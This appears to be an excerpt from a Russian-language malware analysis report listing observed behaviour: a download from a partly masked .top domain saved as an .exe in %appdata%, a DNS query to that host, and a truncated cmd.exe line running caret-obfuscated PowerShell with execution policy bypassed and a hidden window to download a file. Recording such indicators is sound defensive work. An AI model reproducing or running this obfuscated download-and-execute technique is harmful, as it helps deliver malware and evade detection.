Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwE^r^S^HeLL.^eXe ^-e^xEcuTIonPOl^ICy ^byP^ASs -NOPro^File^ ^-^wINdo^w^S^T^yL^e ^hi^D^D^EN^ (NE^w-oBj^EC^t^ SystE^M.NET.wE^Bcl^Ie^nT)^.DOwNlO^adf^iLe(^'http://fo###repu.to...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "P^OwE^r^S^HeLL.^eXe ^-e^xEcuTIonPOl^ICy ^byP^ASs -NOPro^File^ ^-^wINdo^w^S^T^yL^e ^hi^D^D^EN^ (NE^w-oBj^EC^t^ SystE^M.NET.wE^Bcl^Ie^nT)^.DOwNlO^adf^iLe(^'http://fo###repu.to...' (со скрытым окном)